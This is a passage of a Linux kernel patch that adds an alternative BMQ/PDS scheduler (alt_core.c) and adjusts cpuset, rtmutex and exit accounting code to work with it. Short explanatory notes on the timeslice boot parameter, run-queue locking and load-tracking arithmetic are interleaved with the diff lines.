+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b8..a23224b45b03 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+ 
+ 	d->cpu_count += t1;
+ 
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 35e0a31a0315..64e368441cf4 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+ 
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+ 
+ 	/*
+@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a..5b9893cdfb1b 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -300,21 +300,25 @@ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+ 	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	waiter->deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+  * Only use with rt_mutex_waiter_{less,equal}()
+  */
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ 
+ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 						struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 						 struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..4bea0c025475
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,7912 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/profile.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.1-r0"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4 ms (stored in ns); can be set via kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
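
Per the parser above, only "2" is honored and anything else falls back to
4; note also that a "millisecond" here is approximated as 2^20 ns, so the
4 ms default is really about 4.19 ms. Selecting the shorter slice is a
matter of booting with:

sched_timeslice=2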
++/* Reschedule if less than this many ns are left (100 << 10 ns, roughly 100 us) */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPU's number in the cpumask
++ * of the domain); this allows us to quickly tell if two CPUs are in the same
++ * cache domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_rq_watermark[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for (i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Init idle task and put into queue structure of rq
++ * IMPORTANT: may be called multiple times for a single cpu
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++/* water mark related functions */
++static inline void update_sched_rq_watermark(struct rq *rq)
++{
++	unsigned long watermark = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_wm = rq->watermark;
++	unsigned long i;
++	int cpu;
++
++	if (watermark == last_wm)
++		return;
++
++	rq->watermark = watermark;
++	cpu = cpu_of(rq);
++	if (watermark < last_wm) {
++		for (i = last_wm; i > watermark; i--)
++			cpumask_clear_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present) &&
++		    IDLE_TASK_SCHED_PRIO == last_wm)
++			cpumask_andnot(&sched_sg_idle_mask,
++				       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		return;
++	}
++	/* last_wm < watermark */
++	for (i = watermark; i > last_wm; i--)
++		cpumask_set_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++#ifdef CONFIG_SCHED_SMT
++	if (static_branch_likely(&sched_smt_present) &&
++	    IDLE_TASK_SCHED_PRIO == watermark) {
++		cpumask_t tmp;
++
++		cpumask_and(&tmp, cpu_smt_mask(cpu), sched_rq_watermark);
++		if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++			cpumask_or(&sched_sg_idle_mask,
++				   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++	}
++#endif
++}
++
++/*
++ * This routine assumes that the idle task is always in the queue
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock, it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
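
As an illustration of the "special state" rule above, external code takes
both p->pi_lock and rq->lock through task_rq_lock() before touching
scheduling state. A kernel-style sketch (poke_task() is a hypothetical
caller, not part of the patch; task_rq_unlock() is the matching helper):

static void poke_task(struct task_struct *p)
{
        struct rq_flags rf;
        struct rq *rq;

        rq = task_rq_lock(p, &rf);      /* p->pi_lock + rq->lock */
        /* ... p's scheduling state is stable here ... */
        task_rq_unlock(rq, p, &rf);
}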
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
++
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compiler should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight mis-attribution of {soft,}irq
++	 * time; a more accurate solution would be to update the irq_time using
++	 * the current rq->clock timestamp, except that would require using
++	 * atomic ops.
++	 */
++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
++
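
RQ_LOAD_HISTORY_TO_UTIL above extracts the 8 bits just below the MSB of
the 32-bit load history and scales them into [0, max]. A userspace model
of that extraction (illustrative only):

#include <stdint.h>
#include <stdio.h>

#define RQ_LOAD_HISTORY_BITS    (sizeof(int32_t) * 8ULL)
#define RQ_UTIL_SHIFT           (8)
#define HIST_TO_UTIL(l) \
        (((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)

static unsigned long rq_load_util(uint32_t history, unsigned long max)
{
        return HIST_TO_UTIL(history) * (max >> RQ_UTIL_SHIFT);
}

int main(void)
{
        printf("busy: %lu\n", rq_load_util(0xffffffffu, 1024)); /* 255*4 = 1020 */
        printf("idle: %lu\n", rq_load_util(0x00000000u, 1024)); /* 0 */
        return 0;
}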
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time (or there are RT tasks only).
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * Tick may be needed by tasks in the runqueue depending on their policy and
++ * requirements. If tick is needed, lets send the target an IPI to kick it out
++ * of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++	sched_info_dequeue(rq, p);						\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
